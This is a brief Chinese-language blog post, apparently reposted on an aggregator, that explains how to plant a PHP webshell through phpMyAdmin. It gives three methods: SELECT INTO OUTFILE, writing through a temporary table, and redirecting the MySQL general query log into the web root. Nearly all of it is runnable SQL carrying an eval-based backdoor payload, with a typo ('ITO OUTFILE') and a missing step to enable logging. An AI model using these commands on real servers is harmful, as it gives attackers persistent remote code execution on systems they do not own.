zoukankan      html  css  js  c++  java

  • phpMyAdmin写入WebShell(一)

    1.select into outfile直接写入webshell
查询文件写入路径的值
show global variables like '%secure%'
写入webshell
select '<?php @eval($_POST[shell]);?>'INTO OUTFILE 'D:/phpstudy_pro/WWW/test.php' 

2. 创建数据库和写入webshell
CREATE TABLE ctf.test( id text(500) not null);
INSERT INTO ctf.test (id) VALUES('<?php @eval($_POST[cmd]);?>');
SELECT id FROM test ITO OUTFILE 'D:/phpstudy_pro/WWW/1.php';
DROP TABLE IF EXISTS test;

3.通过开启全日志getShell:
查询日志路径和是否允许写入
SHOW VARIABLES LIKE '%general%'
更新日志路径
set global general_log_file='D:/phpstudy_pro/WWW/22.php'
通过查询将webshell写入日志
select '<?php eval($_POST[shell]); ?>'
关闭日志
set global general_log='off';
  • 相关阅读:
    【zZ】OpenCV HOGDescriptor 参数图解
    [C]遍历目录下所有文件
    drawing
    转:基于用户投票的排名算法系列
    编码格式
    泛型
    接口
    隐藏方法不能实现多态性
    结构
    静态
  • 原文地址:https://www.cnblogs.com/ersuani/p/13887938.html
Copyright © 2011-2022 走看看